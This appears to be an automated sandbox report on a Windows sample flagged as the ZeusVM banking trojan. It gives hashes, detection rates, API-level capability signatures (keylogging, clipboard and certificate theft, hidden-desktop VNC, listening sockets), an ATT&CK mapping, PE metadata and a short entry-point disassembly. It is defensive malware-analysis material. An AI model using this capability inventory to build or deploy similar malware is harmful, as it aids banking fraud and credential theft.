Play interactive tour

Edit tour

Analysis Report eUTopTYPuc

Overview

General Information

Sample Name:	eUTopTYPuc (renamed file extension from none to exe)
Analysis ID:	349662
MD5:	09580ec10df3398ce68c176121fbba66
SHA1:	d86cc8b0439b75ffecf6df985161c81f028a6fe2
SHA256:	06a0b2c3fc763506f6340dc4f582f7980378f7ededfb807541afeeca0499d8cd
Tags:	uncategorized
Most interesting Screenshot:

Detection

ZeusVM

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected ZeusVM e-Banking Trojan

Multi AV Scanner detection for submitted file

Contains VNC / remote desktop functionality (version string found)

Machine Learning detection for sample

Antivirus or Machine Learning detection for unpacked file

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

May initialize a security null descriptor

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

eUTopTYPuc.exe (PID: 632 cmdline: 'C:\Users\user\Desktop\eUTopTYPuc.exe' MD5: 09580EC10DF3398CE68C176121FBBA66)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: eUTopTYPuc.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: eUTopTYPuc.exe	Virustotal: Detection: 91%	Perma Link
Source: eUTopTYPuc.exe	Metadefender: Detection: 78%	Perma Link
Source: eUTopTYPuc.exe	ReversingLabs: Detection: 96%

Machine Learning detection for sample

Show sources

Source: eUTopTYPuc.exe

Joe Sandbox ML: detected

Source: 0.0.eUTopTYPuc.exe.400000.0.unpack	Avira: Label: TR/Spy.Zbot.aoqb.5
Source: 0.2.eUTopTYPuc.exe.400000.0.unpack	Avira: Label: TR/Spy.Zbot.aoqb.5

Cryptography:

Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_00417429 CryptUnprotectData,LocalFree,		0_2_00417429
Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_0040812A CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,		0_2_0040812A

Compliance:

Uses 32bit PE files

Show sources

Source: eUTopTYPuc.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Spreading:

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_0041628F GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,

0_2_0041628F

Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_0040C4F3 FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_0040C4F3
Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_0040C5AE FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_0040C5AE

Networking:

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_00408C27 WaitForSingleObject,InternetReadFile,

0_2_00408C27

Source: eUTopTYPuc.exe	String found in binary or memory: http://www.google.com/webhp
Source: eUTopTYPuc.exe	String found in binary or memory: http://www.google.com/webhpbcSeShutdownPrivilegeRFB

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_00404D18 GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,

0_2_00404D18

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_00405CE7 EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,

0_2_00405CE7

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan

Show sources

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_0041D132 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle,

0_2_0041D132

Protection of GUI:

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_0040EF1F OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,

0_2_0040EF1F

System Summary:

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_004087A7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

0_2_004087A7

Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_0040F429 InitiateSystemShutdownExW,ExitWindowsEx,		0_2_0040F429
Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_004136AC CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,		0_2_004136AC

Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_00402823	0_2_00402823
Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_00408036	0_2_00408036
Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_004117CB	0_2_004117CB
Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_00409BD8	0_2_00409BD8

Source: eUTopTYPuc.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: classification engine

Classification label: mal72.bank.troj.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_0041A581 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,		0_2_0041A581
Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_0041A6F6 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,		0_2_0041A6F6

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_00408551 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

0_2_00408551

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_004084FA CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,

0_2_004084FA

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_00417185 CoCreateInstance,

0_2_00417185

Source: eUTopTYPuc.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: eUTopTYPuc.exe	Virustotal: Detection: 91%
Source: eUTopTYPuc.exe	Metadefender: Detection: 78%
Source: eUTopTYPuc.exe	ReversingLabs: Detection: 96%

Data Obfuscation:

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_004178F9 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_004178F9

Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_00403143 push cs; ret	0_2_00403158
Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_00403179 push cs; iretd	0_2_00403188
Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_00402AAD push es; iretd	0_2_00402ABC

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_00411FB9 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,

0_2_00411FB9

Malware Analysis System Evasion:

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_0040C4F3 FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_0040C4F3
Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_0040C5AE FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_0040C5AE

Anti Debugging:

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_004178F9 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_004178F9

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_00412738 mov edx, dword ptr fs:[00000030h]

0_2_00412738

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_00412A7D GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,

0_2_00412A7D

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_0040A474 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

0_2_0040A474

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_0041AC79 RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetLocalTime,

0_2_0041AC79

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_0041A525 GetUserNameExW,

0_2_0041A525

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_00406FAF GetTimeZoneInformation,

0_2_00406FAF

Source: C:\Users\user\Desktop\eUTopTYPuc.exe

Code function: 0_2_00413002 GetComputerNameW,GetVersionExW,RegOpenKeyExW,

0_2_00413002

Lowering of HIPS / PFW / Operating System Security Settings:

Source: eUTopTYPuc.exe

Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)

Show sources

Source: eUTopTYPuc.exe	String found in binary or memory: RFB 003.003
Source: eUTopTYPuc.exe	String found in binary or memory: RFB 003.003
Source: eUTopTYPuc.exe, 00000000.00000000.203019463.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: scriptnbsp;Basic tmp%s%08x.%s%s%08x*SysListView32MDIClientCiceroUIWndFrameConsoleWindowClass#32768SysShadowFIXME.tmphttp://www.google.com/webhpbcSeShutdownPrivilegeRFB 003.003
Source: eUTopTYPuc.exe	String found in binary or memory: RFB 003.003
Source: eUTopTYPuc.exe	String found in binary or memory: scriptnbsp;Basic tmp%s%08x.%s%s%08x*SysListView32MDIClientCiceroUIWndFrameConsoleWindowClass#32768SysShadowFIXME.tmphttp://www.google.com/webhpbcSeShutdownPrivilegeRFB 003.003

Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_0040A2A5 socket,bind,closesocket,		0_2_0040A2A5
Source: C:\Users\user\Desktop\eUTopTYPuc.exe	Code function: 0_2_00409FC7 socket,bind,listen,closesocket,		0_2_00409FC7

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Native API1	Create Account1	Valid Accounts1	Valid Accounts1	Input Capture11	Network Share Discovery1	Remote Desktop Protocol1	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Valid Accounts1	Access Token Manipulation11	Access Token Manipulation11	LSASS Memory	System Time Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Remote Access Software1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Application Shimming1	Application Shimming1	Obfuscated Files or Information1	Security Account Manager	Security Software Discovery1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Install Root Certificate1	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
eUTopTYPuc.exe	92%	Virustotal		Browse
eUTopTYPuc.exe	83%	Metadefender		Browse
eUTopTYPuc.exe	96%	ReversingLabs	Win32.Trojan.Zeus
eUTopTYPuc.exe	100%	Avira	TR/Spy.Zbot.aoqb.5
eUTopTYPuc.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.eUTopTYPuc.exe.400000.0.unpack	100%	Avira	TR/Spy.Zbot.aoqb.5		Download File
0.2.eUTopTYPuc.exe.400000.0.unpack	100%	Avira	TR/Spy.Zbot.aoqb.5		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	349662
Start date:	07.02.2021
Start time:	15:10:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 2m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	eUTopTYPuc (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.bank.troj.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 99.9% (good quality ratio 91%) Quality average: 80% Quality standard deviation: 31.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	MS-DOS executable
Entropy (8bit):	6.695252019797953
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% DOS Executable Borland Pascal 7.0x (2037/25) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	eUTopTYPuc.exe
File size:	141824
MD5:	09580ec10df3398ce68c176121fbba66
SHA1:	d86cc8b0439b75ffecf6df985161c81f028a6fe2
SHA256:	06a0b2c3fc763506f6340dc4f582f7980378f7ededfb807541afeeca0499d8cd
SHA512:	f5c48d2393ed7663016c09dc0f4549cddc1f9fe9f243db74e89de7f14f745ab836657e2f224ac4d70c0c23587a736c508a43c16f4cb4a394d6722844bf047330
SSDEEP:	3072:/SV0AxFxYlFZR3v4iNGMHRHaFtC7qQZkGUGTVpAXhS5qsFwDFox63KruM:/Y0AKlFZR3v4icKHaFGxUsAXhSYsupUb
File Content Preview:	MZ......................................................................................................................................................................................................................PE..L...V..N.....................:.....

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4139f2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x4EAF1E56 [Mon Oct 31 22:16:54 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0b998d2a10b9f3bb78c6703e634f1aff

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push 00000000h
xor bl, bl
call 00007FB00CDDF4A0h
test al, al
je 00007FB00CDE04FAh
push 00008007h
mov byte ptr [ebp-10h], bl
mov byte ptr [ebp-0Ch], 00000001h
mov byte ptr [ebp-01h], bl
call dword ptr [00401178h]
lea eax, dword ptr [ebp-08h]
push eax
call dword ptr [00401174h]
push eax
call dword ptr [004012CCh]
test eax, eax
je 00007FB00CDE04A7h
xor edx, edx
cmp dword ptr [ebp-08h], edx
jle 00007FB00CDE0461h
mov ecx, dword ptr [eax+edx*4]
test ecx, ecx
je 00007FB00CDE0454h
cmp word ptr [ecx], 002Dh
jne 00007FB00CDE044Eh
movzx ecx, word ptr [ecx+02h]
cmp ecx, 66h
je 00007FB00CDE0441h
cmp ecx, 69h
je 00007FB00CDE0438h
cmp ecx, 6Eh
je 00007FB00CDE042Dh
cmp ecx, 76h
jne 00007FB00CDE0436h
mov byte ptr [ebp-01h], 00000001h
jmp 00007FB00CDE0430h
mov byte ptr [ebp-0Ch], 00000000h
jmp 00007FB00CDE042Ah
mov bl, 01h
jmp 00007FB00CDE0426h
mov byte ptr [ebp-10h], 00000001h
inc edx
cmp edx, dword ptr [ebp-08h]
jl 00007FB00CDE03E3h
push eax
call dword ptr [00401130h]
test bl, bl
je 00007FB00CDE0429h
call 00007FB00CDDFE55h
jmp 00007FB00CDE0456h
cmp byte ptr [ebp-01h], 00000000h
je 00007FB00CDE0445h
call 00007FB00CDDA34Bh
call 00007FB00CDD2176h
test byte ptr [00423968h], 00000004h
mov bl, al
je 00007FB00CDE043Dh
push 00000000h
mov eax, 004231B8h
call 00007FB00CDDA1A8h
jmp 00007FB00CDE042Fh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f754	0x118	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25000	0x11a4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x5a0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20634	0x20800	False	0.640144230769	data	6.71836960756	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x204c	0x400	False	0.2099609375	data	1.62977361771	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x25000	0x1664	0x1800	False	0.626302083333	data	5.62270089865	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	FlushFileBuffers, GetTempPathW, GetFileSizeEx, OpenMutexW, GetLastError, SetLastError, VirtualAlloc, VirtualProtectEx, VirtualAllocEx, FindClose, LoadLibraryA, RemoveDirectoryW, WaitForMultipleObjects, FindNextFileW, VirtualProtect, GetFileTime, ReleaseMutex, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetFileInformationByHandle, LocalFree, GetSystemTime, WriteProcessMemory, SetFileAttributesW, CreateThread, ExpandEnvironmentStringsW, SystemTimeToFileTime, UnmapViewOfFile, MultiByteToWideChar, CreateEventW, GetCurrentThreadId, TlsAlloc, TlsFree, MoveFileExW, GetModuleFileNameW, GetUserDefaultUILanguage, ExitProcess, GetCommandLineW, SetErrorMode, GetComputerNameW, GetVersionExW, OpenEventW, DuplicateHandle, GetCurrentProcessId, GetNativeSystemInfo, GetThreadContext, SetThreadContext, GetProcessId, GetPrivateProfileStringW, GetPrivateProfileIntW, lstrcmpiA, WTSGetActiveConsoleSessionId, GetLocalTime, HeapAlloc, CreateProcessW, CreateFileW, GetTimeZoneInformation, ReadFile, Thread32Next, GetFileAttributesW, HeapCreate, HeapDestroy, FreeLibrary, SetEndOfFile, ReadProcessMemory, Sleep, LoadLibraryW, WideCharToMultiByte, Thread32First, WriteFile, VirtualQueryEx, SetFileTime, IsBadReadPtr, GetProcessHeap, VirtualFree, CreateDirectoryW, HeapFree, CreateFileMappingW, SetFilePointerEx, FindFirstFileW, CreateMutexW, HeapReAlloc, GetTempFileNameW, FileTimeToDosDateTime, GetEnvironmentVariableW, CloseHandle, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualFreeEx, OpenProcess, CreateRemoteThread, EnterCriticalSection, GlobalUnlock, LeaveCriticalSection, InitializeCriticalSection, GetTickCount, GlobalLock, ResetEvent, SetThreadPriority, TerminateProcess, TlsSetValue, GetCurrentThread, SetEvent, WaitForSingleObject, TlsGetValue, GetFileAttributesExW, lstrcmpiW, GetProcAddress, MapViewOfFile, GetModuleHandleW
USER32.dll	LoadImageW, MsgWaitForMultipleObjects, WindowFromPoint, CharToOemW, GetWindowLongW, CharLowerA, CharUpperW, SetWindowLongW, SendMessageTimeoutW, GetWindow, DispatchMessageW, GetKeyboardState, ToUnicode, FillRect, PostMessageW, GetWindowInfo, GetTopWindow, IntersectRect, PostThreadMessageW, EqualRect, PrintWindow, SendMessageW, IsRectEmpty, EndPaint, GetMenuItemID, GetUpdateRgn, GetMessageW, RegisterClassExA, GetWindowDC, SetCapture, CharLowerBuffA, CharLowerW, GetThreadDesktop, MapVirtualKeyW, DrawIcon, GetIconInfo, GetSystemMetrics, GetWindowRect, GetParent, GetClassLongW, GetAncestor, SetWindowPos, IsWindow, MapWindowPoints, ExitWindowsEx, CreateDesktopW, SetProcessWindowStation, CloseWindowStation, CreateWindowStationW, GetProcessWindowStation, CloseDesktop, SetThreadDesktop, OpenWindowStationW, SetKeyboardState, GetSubMenu, GetShellWindow, OpenDesktopW, RegisterWindowMessageW, DrawEdge, MenuItemFromPoint, GetMenuItemRect, TrackPopupMenuEx, RegisterClassA, DefFrameProcW, SystemParametersInfoW, GetClassNameW, GetMenuState, GetMenuItemCount, DefDlgProcW, DefFrameProcA, OpenInputDesktop, BeginPaint, GetUpdateRect, GetDC, GetCapture, TranslateMessage, RegisterClassExW, SetCursorPos, GetClipboardData, PeekMessageW, GetDCEx, PeekMessageA, ReleaseDC, DefWindowProcA, GetCursorPos, DefMDIChildProcW, HiliteMenuItem, GetUserObjectInformationW, EndMenu, GetWindowThreadProcessId, GetMessageA, GetMessagePos, DefWindowProcW, CallWindowProcW, CallWindowProcA, RegisterClassW, ReleaseCapture, DefMDIChildProcA, DefDlgProcA, SwitchDesktop, GetMenu
ADVAPI32.dll	GetLengthSid, CryptGetHashParam, OpenProcessToken, GetSidSubAuthority, CryptAcquireContextW, OpenThreadToken, GetSidSubAuthorityCount, GetTokenInformation, RegCreateKeyExW, CryptReleaseContext, RegQueryValueExW, CreateProcessAsUserW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetNamedSecurityInfoW, LookupPrivilegeValueW, CryptCreateHash, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegOpenKeyExW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, CryptDestroyHash, AdjustTokenPrivileges, RegCloseKey, RegSetValueExW, CryptHashData, InitiateSystemShutdownExW, IsWellKnownSid, ConvertSidToStringSidW, EqualSid, RegEnumKeyExW
SHLWAPI.dll	wvnsprintfW, StrStrIW, StrStrIA, StrCmpNIW, PathQuoteSpacesW, PathIsURLW, PathRenameExtensionW, wvnsprintfA, StrCmpNIA, PathMatchSpecW, PathRemoveBackslashW, PathUnquoteSpacesW, PathAddExtensionW, PathCombineW, SHDeleteKeyW, PathSkipRootW, SHDeleteValueW, PathAddBackslashW, PathRemoveFileSpecW, PathFindFileNameW, PathIsDirectoryW, UrlUnescapeA
SHELL32.dll	ShellExecuteW, SHGetFolderPathW, CommandLineToArgvW
Secur32.dll	GetUserNameExW
ole32.dll	StringFromGUID2, CLSIDFromString, CoUninitialize, CoCreateInstance, CoInitializeEx
GDI32.dll	CreateCompatibleBitmap, GetDIBits, CreateDIBSection, SetViewportOrgEx, DeleteDC, GdiFlush, DeleteObject, SelectObject, SetRectRgn, CreateCompatibleDC, GetDeviceCaps, RestoreDC, SaveDC
WS2_32.dll	sendto, getsockname, select, getaddrinfo, recvfrom, getpeername, accept, listen, WSAEventSelect, WSAIoctl, connect, WSAAddressToStringW, WSAStartup, WSAGetLastError, shutdown, setsockopt, bind, socket, recv, freeaddrinfo, WSASend, closesocket, send, WSASetLastError
CRYPT32.dll	CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertCloseStore, CertOpenSystemStoreW, CertDeleteCertificateFromStore, CryptUnprotectData, PFXImportCertStore, PFXExportCertStoreEx
